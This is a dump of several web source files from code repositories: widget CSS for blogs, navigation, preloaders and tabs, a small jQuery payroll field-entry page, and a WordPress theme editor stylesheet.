.w-blog-entry { width: 50%; } .w-blog.columns_3 .w-blog-entry { width: 33.3333%; } .w-blog.columns_4 .w-blog-entry { width: 25%; } .w-blog.columns_5 .w-blog-entry { width: 20%; } /* * .TYPE_MASONRY (show blog posts masonry) */ .w-blog.type_masonry .w-blog-entry { float: left; } /* * .IMGPOS_ATTOP (show blog picture at top) */ .w-blog.imgpos_attop .w-blog-preview, .w-blog.imgpos_attop .w-blog-entry-preview { display: block; } .w-blog.imgpos_attop .w-blog-entry-preview + .w-blog-entry-title { padding-top: 20px; /* Temp */ } /* * .IMGPOS_ATLEFT (show blog picture at left) */ .w-blog.imgpos_atleft .w-blog-entry-preview { display: block; float: left; width: 30%; /* Temp */ } .w-blog.imgpos_atleft .w-blog-entry-title { margin-left: 35%; /* Temp */ padding-top: 0; } .w-blog.imgpos_atleft .w-blog-entry-body { margin-left: 35%; /* Temp */ } /* ************************** Widget w-comments basic styles ************************/ .w-comments-title a { border-bottom: 1px dotted; } .w-comments-list:after { content: ''; display: table; clear: both; } .w-comments-item { margin-bottom: 30px; /* temp */ position: relative; } .w-comments-childlist { margin-left: 30px; /* temp */ } .w-comments-item-meta, .w-comments-item-text, .w-comments-item-answer { margin-left: 70px; /* temp */ } .w-comments-item-meta { margin-bottom: 10px; /* temp */ } .w-comments-item-meta:after { content: ''; display: table; clear: both; } .w-comments-item-icon { position: absolute; top: 0; left: 0; text-align: center; line-height: 50px; /* temp */ width: 50px; /* temp */ } .w-comments-item-author { float: left; font-weight: bold; margin-right: 20px; /* temp */ } .w-comments-item-date { float: left; } .w-comments-item-text { margin-bottom: 10px; /* temp */ } /* ************************ Widget w-gallery basic styles **********************/ .w-gallery-tnails { font-size: 0; position: relative; } .w-gallery-tnail { display: inline-block; vertical-align: top; } .w-gallery-tnail-title { display: none; font-size: 14px; line-height: normal; } /* * .TYPE_MASONRY (show as masonry) */ .w-gallery.type_masonry .w-gallery-tnail { float: left; display: block; height: auto; width: 25%; } /* * .SIZE_* */ .w-gallery.size_xs .w-gallery-tnail { width: 114px; height: 114px; } .w-gallery.size_s .w-gallery-tnail { width: 190px; height: 190px; } .w-gallery.size_m .w-gallery-tnail { width: 228px; height: 228px; } .w-gallery.size_l .w-gallery-tnail { width: 285px; height: 285px; } /* ********************** Widget w-iconbox basic styles *********************/ .w-iconbox { position: relative; } .w-iconbox-link { display: inline; } .w-iconbox-icon { text-align: center; margin: 0 auto; position: relative; } .w-iconbox-icon img { display: none; vertical-align: top; margin: 0 auto; } .w-iconbox .w-iconbox-title { margin-bottom: 0; } .w-iconbox-text p, .w-iconbox-text ul, .w-iconbox-text ol { margin-bottom: 10px; /* temp */ } /* .CUSTOM_IMG */ .w-iconbox.custom_img .w-iconbox-icon i { display: none; } .w-iconbox.custom_img .w-iconbox-icon img { display: inline-block; } /* ICONPOS: top */ .w-iconbox.iconpos_top { text-align: center; margin: 0 auto; max-width: 350px; /* temp */ } /* ICONPOS: left */ .w-iconbox.iconpos_left { text-align: left; } .w-iconbox.iconpos_left:after { display: table; content: ''; clear: both; } .w-iconbox.iconpos_left .w-iconbox-icon { float: left; } /* SIZE: tiny */ .w-iconbox.size_tiny .w-iconbox-icon { font-size: 30px; line-height: 30px; width: 30px; } .w-iconbox.size_tiny .w-iconbox-icon img { max-width: 30px; } .w-iconbox.size_tiny.iconpos_left .w-iconbox-title, .w-iconbox.size_tiny.iconpos_left .w-iconbox-text { margin-left: 44px; /* temp */ } /* SIZE: small */ .w-iconbox.size_small .w-iconbox-icon { font-size: 40px; line-height: 40px; width: 40px; } .w-iconbox.size_small .w-iconbox-icon img { max-width: 40px; } .w-iconbox.size_small.iconpos_left .w-iconbox-title, .w-iconbox.size_small.iconpos_left .w-iconbox-text { margin-left: 56px; /* temp */ } /* SIZE: medium */ .w-iconbox.size_medium .w-iconbox-icon { font-size: 50px; line-height: 50px; width: 50px; } .w-iconbox.size_medium .w-iconbox-icon img { max-width: 50px; } .w-iconbox.size_medium.iconpos_left .w-iconbox-title, .w-iconbox.size_medium.iconpos_left .w-iconbox-text { margin-left: 68px; /* temp */ } /* SIZE: big */ .w-iconbox.size_big .w-iconbox-icon { font-size: 70px; line-height: 70px; width: 70px; } .w-iconbox.size_big .w-iconbox-icon img { max-width: 70px; } .w-iconbox.size_big.iconpos_left .w-iconbox-title, .w-iconbox.size_big.iconpos_left .w-iconbox-text { margin-left: 92px; /* temp */ } /* SIZE: huge */ .w-iconbox.size_huge .w-iconbox-icon { font-size: 100px; line-height: 100px; width: 100px; } .w-iconbox.size_huge .w-iconbox-icon img { max-width: 100px; } .w-iconbox.size_huge.iconpos_left .w-iconbox-title, .w-iconbox.size_huge.iconpos_left .w-iconbox-text { margin-left: 120px; /* temp */ } /* ************************** Widget w-lang basic styles ************************/ .w-lang { position: relative; } .w-lang-item { text-align: left; padding: 0 10px; } .w-lang-item-icon { display: inline-block; vertical-align: middle; width: 16px; height: 16px; cursor: pointer; } .w-lang-item-title { display: inline-block; vertical-align: middle; cursor: pointer; } .w-lang-item.active { cursor: default; } .w-lang-item.active .w-lang-item-title { cursor: default; } .w-lang-item.active .w-lang-item-icon { cursor: default; } .w-lang-current { display: none; } /* * .LAYOUT_HOR (languages display horizontal at the list) */ .w-lang.layout_hor .w-lang-list { overflow: hidden; } .w-lang.layout_hor .w-lang-item { float: left; } /* * .LAYOUT_DROPDOWN (languages display vertical at the list) */ .w-lang.layout_dropdown .w-lang-list { display: none; position: absolute; z-index: 1; padding-top: 30px; } .w-lang.layout_dropdown .w-lang-item, .w-lang.layout_dropdown .w-lang-current { display: block; } /* * .HAS_TITLE (show only title of the languages) */ .w-lang.has_title .w-lang-item-icon { display: none; } /* * .HAS_ICON (show only icon of the languages) */ .w-lang.has_icon .w-lang-item-title { display: none; } /* * .HAS_ICONTITLE (show icon and title of the languages) */ .w-lang.has_icontitle .w-lang-item-icon { margin-right: 5px; } /* ************************** Widget w-logo basic styles ************************/ .w-logo { clear: both; height: 100%; position: relative; } .w-logo-link { display: block; font-size: 0; height: 100%; } .w-logo-img { display: inline-block; vertical-align: middle; } .w-logo-title { display: none; font-size: 2em; white-space: normal; } .w-logo-slogan { display: none; vertical-align: baseline; } /* * .WITH_TITLE (show logo text) */ .w-logo.with_title .w-logo-img { display: none; } .w-logo.with_title .w-logo-title { display: block; } /* * .SLOGANAT_RIGHT (show slogan on right side of the logo) */ .w-logo.sloganat_right .w-logo-link { display: inline-block; vertical-align: baseline; margin-right: 30px; /* temp */ } .w-logo.sloganat_right .w-logo-slogan { display: inline-block; } /* * .SLOGANAT_BOTTOM (show slogan on bottom side of the logo) */ .w-logo.sloganat_bottom .w-logo-slogan { display: block; } /* ************************** Widget w-nav basic styles ************************/ .w-nav:after { content: ''; display: block; clear: both; } .w-nav-control { display: none; } .w-nav-list { display: block; width: auto; min-width: 150px; /* temp */ } .g-html .w-nav-list { list-style: none; margin: 0; } .w-nav-list.level_2 { display: none; position: absolute; left: auto; top: auto; z-index: 10; } .w-nav-list.level_3 { display: none; position: absolute; left: 100%; top: 0; z-index: 11; } .w-nav-item:hover > .w-nav-list { display: block; } .w-nav-item { display: block; position: relative; } .w-nav-anchor { display: block; text-align: left; text-decoration: none; padding: 10px 20px; /* temp */ overflow: hidden; position: relative; } .w-nav-icon { display: none; vertical-align: top; margin-right: 5px; /* temp */ } /* * .LAYOUT_HOR (horizontal layout) */ .w-nav.layout_hor > .w-nav-list:after { display: table; content: ''; clear: both; } .w-nav.layout_hor > .w-nav-list > .w-nav-item { float: left; } /* * .layout_hor.WIDTH_STRETCH (width: 100%, list acts like a table) */ .w-nav.layout_hor.width_stretch > .w-nav-list { display: table; width: 100%; } .w-nav.layout_hor.width_stretch > .w-nav-list > .w-nav-item { float: none; display: table-cell; } .w-nav.layout_hor.width_stretch > .w-nav-list > .w-nav-item > .w-nav-anchor { text-align: center; } /* * .LAYOUT_VER (vertical layout) */ .w-nav.layout_ver .w-nav-list.level_2 { left: 100%; top: 0; } /* * .layout_ver.PLACE_INSIDE (locates sublevel list inside the parent item) */ .w-nav.layout_ver.place_inside .w-nav-list { display: block; position: static; } .w-nav.layout_ver.place_inside .w-nav-list.level_2 .w-nav-anchor.level_2 { padding-left: 40px; /* temp */ } .w-nav.layout_ver.place_inside .w-nav-list.level_3 .w-nav-anchor.level_3 { padding-left: 60px; /* temp */ } /* * .WITH_ICONS (show item with icon) */ .w-nav.with_icons .w-nav-icon { display: inline; } .w-nav.with_icons .w-nav-title { text-align: left; } /* * .touch_disabled .COLUMNS_* (dropdown list divides by columns) */ .w-nav.touch_disabled [class*="columns"] { position: static; } .w-nav.touch_disabled [class*="columns"] .w-nav-list.level_2 { left: 0; right: 0; font-size: 0; line-height: 0; width: 100%; } .w-nav.touch_disabled [class*="columns"] .w-nav-item.level_2 { display: inline-block; vertical-align: top; } .w-nav.touch_disabled .columns_2 .w-nav-item.level_2 { width: 50%; } .w-nav.touch_disabled .columns_3 .w-nav-item.level_2 { width: 33.3333%; } .w-nav.touch_disabled .columns_4 .w-nav-item.level_2 { width: 25%; } .w-nav.touch_disabled .columns_5 .w-nav-item.level_2 { width: 20%; } .w-nav.touch_disabled [class*="columns"] .w-nav-list.level_3 { display: block; position: static; } /* * .w-nav-item.DROP_LEFT (drops sublevel list of item to the left) */ .w-nav-item.level_1.drop_left .w-nav-list.level_2 { right: 0; } .w-nav-item.level_2.drop_left .w-nav-list.level_3 { left: auto; right: 100%; } /* ********************** Widget w-portfolio basic styles *********************/ .w-portfolio-list { position: relative; } .w-portfolio-list:after { content: ''; display: block; clear: both; } .w-portfolio-item { float: left; } .w-portfolio-item-anchor { display: block; height: 100%; width: 100%; position: relative; } .w-portfolio-item-image img { display: block; margin: 0 auto; } .w-portfolio-item-title { font-size: 1.5em; /* temp */ margin-bottom: 0; } .w-portfolio-item-text { display: block; } /* * .META_ONHOVER */ .w-portfolio.meta_onhover .w-portfolio-item-meta { position: absolute; bottom: 0; width: 100%; } /* * .WITH_INDENTS */ .w-portfolio.with_indents .w-portfolio-list { margin: -5px; /* temp */ } .w-portfolio.with_indents .w-portfolio-item { padding: 5px; /* temp */ } /* * .COLUMNS_* */ .w-portfolio.columns_5 .w-portfolio-item { width: 20%; } .w-portfolio.columns_4 .w-portfolio-item { width: 25%; } .w-portfolio.columns_3 .w-portfolio-item { width: 33.3333%; } .w-portfolio.columns_2 .w-portfolio-item { width: 50%; } /* ********************** Widget w-preloader basic styles *********************/ .w-preloader { display: inline-block; position: relative; font-size: 16px; /* temp */ width: 3em; height: 3em; background-color: #fff; /* temp */ color: #c20; /* temp */ } /* TYPE 1 */ .w-preloader.type_1:after { content: ''; position: absolute; top: 0; left: 0; width: 2.8em; height: 2.8em; border-radius: 50%; border-width: 0.1em; border-style: solid; border-color: transparent; border-top-color: inherit; -webkit-animation: rotation 1s infinite linear; animation: rotation 1s infinite linear; } @-webkit-keyframes rotation { 0% { -webkit-transform: rotate(0deg); } 100% { -webkit-transform: rotate(360deg); } } @keyframes rotation { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } /* TYPE 2 */ .w-preloader.type_2:before { content: ''; display: block; position: absolute; top: 0; left: 0; width: 2.8em; height: 2.8em; border: 0.1em solid; border-radius: 50%; opacity: 0.2; } .w-preloader.type_2:after { content: ''; position: absolute; top: 0; left: 0; width: 2.8em; height: 2.8em; border-radius: 50%; border-width: 0.1em; border-style: solid; border-color: transparent; border-top-color: inherit; -webkit-animation: rotation 1s infinite linear; animation: rotation 1s infinite linear; } /* TYPE 3 */ .w-preloader.type_3:before { content: ''; display: block; position: absolute; top: 0; left: 0; width: 2.8em; height: 2.8em; border: 0.1em solid; border-radius: 50%; } .w-preloader.type_3 .w-preloader-h { position: relative; top: 0.2em; left: 0.2em; width: 2.6em; height: 2.6em; border-radius: 50%; background-color: inherit; -webkit-animation: rotation 1s infinite linear; animation: rotation 1s infinite linear; } .w-preloader.type_3 .w-preloader-h:after { content: ''; position: absolute; top: 0; left: 50%; margin: -0.4em 0 0 -0.25em; width: 0.5em; height: 0.5em; background-color: inherit; } /* TYPE 4 */ .w-preloader.type_4 .w-preloader-h { position: relative; width: 3em; height: 3em; background: inherit; border-radius: 50%; border: 0.1em solid; } .w-preloader.type_4 .w-preloader-h:before { content: ''; position: absolute; top: -0.2em; left: -0.2em; width: 1.6em; height: 3.3em; background: inherit; -webkit-transform-origin: 1.6em 1.6em; transform-origin: 1.6em 1.6em; -webkit-animation: rotation 2s infinite ease 1.5s; animation: rotation 2s infinite ease 1.5s; } .w-preloader.type_4 .w-preloader-h:after { content: ''; position: absolute; top: -0.2em; left: 1.4em; width: 1.6em; height: 3.3em; background: inherit; -webkit-transform-origin: 0px 1.6em; transform-origin: 0px 1.6em; -webkit-animation: rotation 2s infinite ease; animation: rotation 2s infinite ease; } /* TYPE 5 */ .w-preloader.type_5:before { content: ''; display: block; position: absolute; top: 0; left: 0; width: 2.8em; height: 2.8em; border: 0.1em solid; border-radius: 50%; opacity: 0.2; } .w-preloader.type_5 .w-preloader-h { position: relative; width: 3em; height: 3em; -webkit-animation: rotation 1s infinite ease-out; animation: rotation 1s infinite ease-out; } .w-preloader.type_5 .w-preloader-h:after { content: ''; position: absolute; top: 0; left: 50%; margin: -0.2em 0 0 -0.2em; width: 0; height: 0; border-radius: 50%; border: 0.3em solid; } /* TYPE 6 */ .w-preloader.type_6 .w-preloader-h { width: 3em; height: 3em; background-color: inherit; border: 1.5em solid; border-radius: 50%; } .w-preloader.type_6 .w-preloader-h:after { content: ''; position: absolute; top: 0; left: 0; right: 0; bottom: 0; border-radius: 50%; background-color: inherit; -webkit-animation: scale 1.6s infinite ease; animation: scale 1.6s infinite ease; } @-webkit-keyframes scale { 0% { -webkit-transform: scale(0); } 50% { -webkit-transform: scale(1); } 100% { -webkit-transform: scale(0); } } @keyframes scale { 0% { transform: scale(0); } 50% { transform: scale(1); } 100% { transform: scale(0); } } /* TYPE 7 */ .w-preloader.type_7 .w-preloader-h { width: 3em; height: 3em; background-color: inherit; border: 0.1em solid; border-radius: 50%; -webkit-animation: scale2 1.6s infinite ease; animation: scale2 1.6s infinite ease; } @-webkit-keyframes scale2 { 0% { -webkit-transform: scale(0.1); border-width: 1.5em; } 50% { -webkit-transform: scale(1); border-width: 0.1em; } 100% { -webkit-transform: scale(0.1); border-width: 1.5em; } } @keyframes scale2 { 0% { transform: scale(0.1); border-width: 1.5em; } 50% { transform: scale(1); border-width: 0.1em; } 100% { transform: scale(0.1); border-width: 1.5em; } } /* ********************** Widget w-pricing basic styles *********************/ .w-pricing { display: table; table-layout: fixed; width: 100%; position: relative; } .w-pricing-item { display: table-cell; vertical-align: top; text-align: center; } .w-pricing-item-title { padding: 10px; /* temp */ } .w-pricing-item-price { font-size: 2em; /* temp */ padding: 10px; /* temp */ } .w-pricing-item-price small { font-size: 0.5em; /* temp */ } .w-pricing-item-feature { padding: 10px; /* temp */ } .w-pricing-item-footer { padding: 10px; /* temp */ } /* ************************** Widget w-search basic styles ************************/ .w-search-form { position: relative; min-width: 100px; } .w-search-input { position: relative; } .w-search input[type="text"] { width: auto; } .w-search input[type="submit"] { display: none; } /* * .SUBMIT_OUTSIDE (button submit outside search container) */ .w-search.submit_outside .w-search-input:after { display: block; content: ''; clear: both; } .w-search.submit_outside input[type="text"], .w-search.submit_outside input[type="submit"] { display: block; float: left; } /* * .SUBMIT_INSIDE (button submit inside search container) */ .w-search.submit_inside input[type="text"] { width: 100%; } .w-search.submit_inside input[type="submit"] { display: block; position: absolute; right: 0; top: 0; } /* ************************** Widget w-socials basic styles ************************/ .w-socials-list { font-size: 0; } .w-socials-item { display: inline-block; vertical-align: top; position: relative; } .w-socials-item-link { display: block; text-align: center; font-size: 18px; /* temp */ line-height: 40px; /* temp */ height: 40px; /* temp */ width: 40px; /* temp */ } .w-socials-item-popup { position: absolute; left: 0; bottom: 50px; /* temp */ font-size: 13px; /* temp */ line-height: 26px; /* temp */ padding: 0 10px; /* temp */ visibility: hidden; z-index: 10; opacity: 0; background-color: rgba(0,0,0,0.8); color: #fff; transform: translateY(-20px); transition: transform 0.2s ease-out 0.3s, opacity 0.2s ease-out 0.3s; } .w-socials-item:hover .w-socials-item-popup { visibility: visible; opacity: 1; transform: translateY(0); } .w-socials-item-popup:after { content: ''; display: block; position: absolute; bottom: -6px; left: 10px; /* temp */ width: 0; height: 0; border-left: 6px solid transparent; border-right: 6px solid transparent; border-top: 6px solid rgba(0,0,0,0.8); } /* * .SIZE_NORMAL */ .w-socials.size_normal .w-socials-item-link { font-size: 22px; /* temp */ line-height: 50px; /* temp */ height: 50px; /* temp */ width: 50px; /* temp */ } .w-socials.size_normal .w-socials-item-popup { bottom: 60px; /* temp */ } /* * .SIZE_BIG */ .w-socials.size_big .w-socials-item-link { font-size: 28px; /* temp */ line-height: 60px; /* temp */ height: 60px; /* temp */ width: 60px; /* temp */ } .w-socials.size_big .w-socials-item-popup { bottom: 70px; /* temp */ } /* ************************** Widget w-tabs basic styles ************************/ .w-tabs-list { position: relative; } .w-tabs-list:after { content: ''; display: block; clear: both; } .w-tabs-item { float: left; padding: 10px; cursor: pointer; } .w-tabs-item-icon { display: none; vertical-align: top; } .w-tabs-item-title { display: inline-block; vertical-align: top; } .w-tabs-section { position: relative; } .w-tabs-section-header { display: none; position: relative; cursor: pointer; padding: 10px; /* temp */ } .w-tabs-section-icon { display: none; vertical-align: top; } .w-tabs-section-title { display: inline-block; vertical-align: top; margin: 0; padding-right: 40px; /* temp */ } .g-html .w-tabs-section-title { padding-top: 0; } .w-tabs-section-control { display: block; position: absolute; top: 10px; /* temp */ right: 10px; /* temp */ width: 24px; /* temp */ line-height: 24px; /* temp */ } .w-tabs-section-content { display: none; padding: 10px; /* temp */ } .w-tabs-section.active .w-tabs-section-content { display: block; } /* * .WITH_ICON (display icons in tab's titles) */ .w-tabs-item.with_icon .w-tabs-item-icon, .w-tabs-section.with_icon .w-tabs-section-icon { display: inline-block; } .w-tabs-item.with_icon .w-tabs-item-title, .w-tabs-section.with_icon .w-tabs-section-title { margin-left: 10px; /* temp */ } /* * .LAYOUT_ACCORDION (tabs to accordion) */ .w-tabs.layout_accordion .w-tabs-list { display: none; } .w-tabs.layout_accordion .w-tabs-section-header { display: block; } /* ********************** Widget w-team basic styles *********************/ .w-team { margin: 0 auto; position: relative; max-width: 450px; /* temp */ } .w-team-image { line-height: 0; position: relative; } .w-team-name { margin-bottom: 10px; /* temp */ } .w-team-role { margin-bottom: 10px; /* temp */ } .w-team-links-item { display: inline-block; vertical-align: top; } /* ************************** Widget w-timeline basic styles ************************/ .w-timeline-list { position: relative; font-size: 0; line-height: 0; text-align: justify; } .w-timeline-list:before { display: block; content: ''; position: absolute; top: 50%; left: 0; right: 0; margin-top: -2px; /* temp */ height: 4px; /* temp */ } .w-timeline-list:after { display: inline-block; content: ''; height: 0; width: 100%; overflow: hidden; visibility: hidden; } .w-timeline-item { display: inline-block; vertical-align: top; text-align: center; font-size: 16px; /* temp */ line-height: 30px; /* temp */ width: 60px; /* temp */ cursor: pointer; position: relative; z-index: 1; } .w-timeline-section { position: relative; } .w-timeline-section-title { display: none; text-align: center; margin: 10px auto; /* temp */ line-height: 30px; /* temp */ width: 60px; /* temp */ cursor: pointer; position: relative; } .w-timeline-section-content { position: relative; } /* * .TYPE_VERTICAL */ .w-timeline.type_vertical .w-timeline-list { display: none; } .w-timeline.type_vertical .w-timeline-section-title { display: block; } .w-timeline.type_vertical .w-timeline-section:before { display: block; content: ''; position: absolute; top: 0; left: 50%; margin-left: -2px; /* temp */ width: 4px; /* temp */ height: 100%; } /* ************************** Widget w-video basic styles ************************/ .w-video { position: relative; height: 0; overflow: hidden; padding-bottom: 56.25%; /* 16:9 aspect ratio */ } .w-video iframe, .w-video object, .w-video embed { position: absolute; top: 0; left: 0; width: 100%; height: 100%; } /* * .RATIO_4-3 (4:3 aspect ratio) */ .w-video.ratio_4-3 { padding-bottom: 75%; } /* * .RATIO_3-2 (3:2 aspect ratio) */ .w-video.ratio_3-2 { padding-bottom: 66.667%; } /* * .RATIO_1-1 (1:1 aspect ratio square format) */ .w-video.ratio_1-1 { padding-bottom: 100%; }
PayRollManager/EfeildsAdd.html
SigmaVEC/PayRollManager
<html> <head> <title>Add Fields</title> <link rel="stylesheet" href="css/bootstrap.min.css"/> <link rel="stylesheet" href="css/bootstrap-theme.css"/> <script src="js/jquery.js"></script> <script src="js/bootstrap.min.js" type="text/javascript"></script> <script src="js/script.js"></script> </head> <body> <div id="top"> <span id="logo">Pay Roll Manager</span> <button type="button" class="btn btn-primary dropdown-toggle menu" data-toggle="dropdown"> User <span class="caret"></span> </button> <ul class="dropdown-menu menu" role="menu"> <li><a href="#">Profile</a></li> <li><a href="#">Edit Details</a></li> <li><a href="#">Sign out</a></li> </ul> </div> &nbsp; <div id="test"></div> <div class="container"> <div class="row" id="outer"> <div class="panel panel-default"> <div class="panel-heading">Personal Info <span class="glyphicon glyphicon-plus add" id="addPersonal"></span></div> <table class="table table-striped table-bordered" id="tablePersonal"> <tr class="inputGroupInfo"> <td><input type="text" class="form-control" placeholder="type 1" name="ptype1"/></td> </tr> </table> </div> &nbsp; <div class="panel panel-default"> <div class="panel-heading">Salary Info <span class="glyphicon glyphicon-plus add" id="addSalary"></span></div> <table class="table table-striped table-bordered" id="tableSalary"> <tr class="inputGroupSalary" > <td><input type="text" class="form-control" placeholder="type 1" name="stype1"/></td> <td><label class="control-label"><input type="checkbox" value="isPercent" name="ispercent" class="ispercent"/> ispercent</label> </td> <td><label class="control-label"><input type="radio" value="addition" name="adjustment1" selected /> Addition </label></td> <td><label class="control-label"><input type="radio" value="redution" name="adjustment1"/> Reduction </label></td> </tr> </table> </div> <button class="btn btn-primary btn-block" style="margin-left:20%; width:60%"id="submit">Submit</button> </div> </div> </body> <style> #test{ position: absolute; width: 100%; height: 100%; background-color:aqua; } #top{ height:50px; background-color:#455a64; /*background: #007299;*/ padding-left:5%; color: #fff; font-size: 30px; font-weight: bold; } .menu{ position: static; float: right; margin-top: 7px; margin-right: 7px; } .add{ position: static; float: right; font-size:20px; color:#666; } .add:hover{ color:#59F; cursor: pointer; } </style> <script> var count=2; var cnt=2; var th = $("#test").height(); var toph = $("#top").height(); $("#test").hide(); $("#addPersonal").on("click", function(){ $("#tablePersonal").append('<tr id="per"'+cnt+'class="inputGroupInfo"><td><input type="text" class="form-control" placeholder="type '+cnt+'" name="ptype'+cnt+'"/></td></tr>'); cnt++; }); $("#addSalary").on("click", function(){ s=`<tr class="inputGroupSalary" id="sal"`+count+`> <td><input type="text" class="form-control" placeholder="type `+count+`" name="stype`+count+`"/></td> <td><label class="control-label"><input checked type="checkbox" value="isPercent" name="ispercent`+count+`" class="ispercent"/> ispercent </label></td> <td><label class="control-label"><input type="radio" value="addition" name="adjustment`+count+`" selected /> Addition</label> </td> <td><label class="control-label"><input type="radio" value="redution" name="adjustment`+count+`"/> Reduction </label></td> </tr>`; $("#tableSalary").append(s); count++; }); $("#submit").on("click",function(){}); </script> </html>
wp-content/themes/sampression-lite/lib/css/editor-style.css
bechirbenhammed/critiques
/* Theme Name: Sampression Lite Description: Used to style the TinyMCE editor. */ /** * Table of Contents: * * 1.0 - Body * 2.0 - Typography * 3.0 - Elements * 4.0 - Alignment * 5.0 - Caption * 6.0 - Galleries * 7.0 - Audio / Video * 8.0 - RTL */ /** * 1.0 - Body */ body { color: #1a1a1a; font-family: Merriweather, Georgia, serif; font-size: 16px; font-weight: 400; line-height: 1.75; margin: 0 20px; vertical-align: baseline; } /** * 2.0 - Typography */ h1, h2, h3, h4, h5, h6 { clear: both; font-weight: 900; } h1 { font-size: 24px; } h2 { font-size: 18px; } h3 { font-size: 16px; } h4 { font-size: 14px; } h5 { font-size: 12px; } h6 { font-size: 10px; } p { margin: 0 0 20px 0; } b, strong { font-weight: 700; } dfn, cite, em, i { font-style: italic; } blockquote { margin: 15px 30px 15px 10px; padding-left: 20px; border-left: 5px solid #ddd; } blockquote:not(.alignleft):not(.alignright) { margin-left: -8px; } blockquote blockquote:not(.alignleft):not(.alignright) { margin-left: 0; } blockquote:before, blockquote:after { content: ""; display: table; } blockquote:after { clear: both; } blockquote > :last-child { margin-bottom: 0; } blockquote cite, blockquote small { color: #1a1a1a; font-size: 16px; line-height: 1.75; } blockquote em, blockquote i, blockquote cite { font-style: normal; } blockquote strong, blockquote b { font-weight: 400; } blockquote.alignleft, blockquote.alignright { border: 0 solid #1a1a1a; border-top-width: 4px; padding: 18px 0 0; width: -webkit-calc(50% - 14px); width: calc(50% - 14px); } address { font-style: italic; margin: 0 0 28px; } code, kbd, tt, var, samp, pre { font-family: Inconsolata, monospace; } pre { font-size: 14px; margin-left: 20px; white-space: pre; white-space: pre-wrap; max-width: 100%; } code { background-color: #d1d1d1; padding: 2px 4px; } abbr[title] { border-bottom: 1px dotted #d1d1d1; cursor: help; } mark, ins { background: #8AB7AC; color: #fff; text-decoration: none; } sup, sub { font-size: 75%; height: 0; line-height: 0; position: relative; vertical-align: baseline; } sub { top: -6px; } sup { bottom: -3px; } small { font-size: 80%; } big { font-size: 125%; } /** * 3.0 - Elements */ hr { border: solid #ddd; border-width: 1px 0 0; clear: both; margin: 10px 0 30px; height: 0; } ul, ol { margin: 0 0 28px 20px; padding: 0; } ul, ol, dl { margin-bottom: 20px; } ul { list-style: disc; } ul ul { list-style: circle; } ol { list-style: decimal; } li > ul, li > ol { margin-bottom: 0; } li > ul, blockquote > ul { margin-left: 20px; } li > ol, blockquote > ol { margin-left: 24px; } dl { margin: 0 0 28px; } dt { font-weight: bold; } dd { margin: 0 0 28px; } table, th, td, .mce-item-table, .mce-item-table th, .mce-item-table td { border: 1px solid #d1d1d1; } table a { color: #8AB7AD; } table, .mce-item-table { border-collapse: separate; border-spacing: 0; border-width: 1px 0 0 1px; margin: 0 0 28px; width: 100%; } table th, .mce-item-table th, table caption { border-width: 0 1px 1px 0; font-size: 16px; font-weight: 700; padding: 7px; text-align: left; vertical-align: baseline; } table td, .mce-item-table td { border-width: 0 1px 1px 0; font-size: 16px; padding: 7px; vertical-align: baseline; } img { border: 0; height: auto; max-width: 100%; vertical-align: middle; } a img { display: block; } figure { margin: 0; } del { opacity: 0.8; } a { box-shadow: 0 1px 0 0 currentColor; color: #007acc; text-decoration: none; } fieldset { border: 1px solid #d1d1d1; margin: 0 0 28px; padding: 14px; } /** * 4.0 - Alignment */ .alignleft { float: left; margin: 6px 28px 28px 0; } .alignright { float: right; margin: 6px 0 28px 28px; } .aligncenter { clear: both; display: block; margin: 0 auto 28px; } /** * 5.0 - Caption */ .wp-caption { max-width: 100%; text-align: center; padding: 0; margin: 0; border-radius: 3px; } .wp-caption-text, .wp-caption-dd { color: #686868; font-size: 13px; font-style: italic; line-height: 1.6153846154; padding-top: 7px; } /** * 6.0 - Galleries */ .mce-content-body .wpview-wrap { margin-bottom: 28px; } .gallery { margin: 0 -1.1666667%; padding: 0; } .gallery .gallery-item { display: inline-block; max-width: 33.33%; padding: 0 1.1400652% 2.2801304%; text-align: center; vertical-align: top; width: 100%; } .gallery-columns-1 .gallery-item { max-width: 100%; } .gallery-columns-2 .gallery-item { max-width: 50%; } .gallery-columns-4 .gallery-item { max-width: 25%; } .gallery-columns-5 .gallery-item { max-width: 20%; } .gallery-columns-6 .gallery-item { max-width: 16.66%; } .gallery-columns-7 .gallery-item { max-width: 14.28%; } .gallery-columns-8 .gallery-item { max-width: 12.5%; } .gallery-columns-9 .gallery-item { max-width: 11.11%; } .gallery .gallery-caption { font-size: 13px; margin: 0; } .gallery-columns-6 .gallery-caption, .gallery-columns-7 .gallery-caption, .gallery-columns-8 .gallery-caption, .gallery-columns-9 .gallery-caption { display: none; } /** * 7.0 - Audio / Video */ .wp-audio-shortcode a, .wp-playlist a { box-shadow: none; } .mce-content-body .wp-audio-playlist { margin: 0; padding-bottom: 0; } .mce-content-body .wp-playlist-tracks { margin-top: 0; } .mce-content-body .wp-playlist-item { padding: 10px 0; } .mce-content-body .wp-playlist-item-length { top: 10px; } /** * 8.0 - RTL */ .rtl blockquote { border: 0 solid #1a1a1a; border-right-width: 4px; } .rtl blockquote.alignleft, .rtl blockquote.alignright { border: 0 solid #1a1a1a; border-top-width: 4px; } .rtl blockquote:not(.alignleft):not(.alignright) { margin-right: -28px; padding: 0 24px 0 0; } .rtl blockquote blockquote:not(.alignleft):not(.alignright) { margin-right: 0; margin-left: auto; } .rtl li > ul, .rtl blockquote > ul { margin-right: 20px; margin-left: auto; } .rtl li > ol, .rtl blockquote > ol { margin-right: 24px; margin-left: auto; } .rtl table th, .rtl .mce-item-table th, .rtl table caption { text-align: right; }
lib/richfaces/doc/javadoc/org/richfaces/component/class-use/AbstractNotify.html
Jacksson/mywmsnb
